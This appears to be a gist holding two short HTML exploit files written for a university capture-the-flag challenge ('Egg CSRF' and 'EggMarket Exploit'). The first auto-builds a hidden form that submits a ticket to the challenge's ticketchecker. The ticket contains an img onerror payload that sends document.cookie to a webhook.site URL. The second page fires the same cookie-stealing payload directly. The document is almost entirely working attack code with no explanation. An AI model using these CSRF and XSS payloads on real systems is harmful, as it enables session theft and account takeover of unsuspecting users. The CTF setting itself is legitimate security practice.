This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <meta charset="utf-8"> | |
| <title>Egg CSRF</title> | |
| <form id="f" action="http://challenges.iik3100-h25.iaas.iik.ntnu.no/ticketchecker/submit_ticket" method="POST"> | |
| <input type="hidden" name="title" value="urgent review"> | |
| <input type="hidden" name="issue_url" value=""> | |
| <textarea name="description" style="display:none"> | |
| <img src=x onerror="new Image().src='https://webhook.site/a2ec6b56-a30e-4bc6-84ba-3edcb79784ef/?c='+encodeURIComponent(document.cookie)"> | |
| </textarea> | |
| </form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html> | |
| <html> | |
| <head><meta charset="utf-8"><title>EggMarket Exploit</title></head> | |
| <body> | |
| <img src=x onerror="new Image().src='https://webhook.site/a2ec6b56-a30e-4bc6-84ba-3edcb79784ef/?c='+encodeURIComponent(document.cookie)"> | |
| </body> | |
| </html> |